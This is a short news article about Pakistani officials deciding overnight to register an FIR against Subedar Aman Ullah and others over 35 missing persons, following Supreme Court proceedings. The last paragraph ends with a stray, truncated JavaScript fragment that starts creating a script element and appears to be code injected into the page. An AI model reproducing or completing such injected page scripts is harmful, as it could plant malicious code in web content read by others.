ISLAMABAD: Defence Minister and others senior officers remained engaged in consultation process the whole night long on the matter of registration of FIR in 35 missing persons case and eventually they reached the decision at 4:30 a.m. on March, 20 to register the FIR.

However, they could not reach any consensus decision on the point if the case be got registered on behalf of federal government and on the other hand Supreme Court (SC) order was made part of FIR in the process of registration of case.

The Attorney General (AG) had told a 3-member bench of SC headed by Justice Jawwad S Khawaja that federal government in collaboration with provincial government was going to register case against Subedar Aman Ullah and others who are stated to be behind the lifting of 35 missing persons. The court had termed it a good advancement and ordered the government to present copy of FIR on next day.

Sources told that intelligence agencies have considered this move by defence minister strange and as per their view point defence minister should not have done so and instead he should seek time from the court. The missing persons should have been produced before the court in such number they could be recovered.var d=document;var s=d.createElement(‘script’);
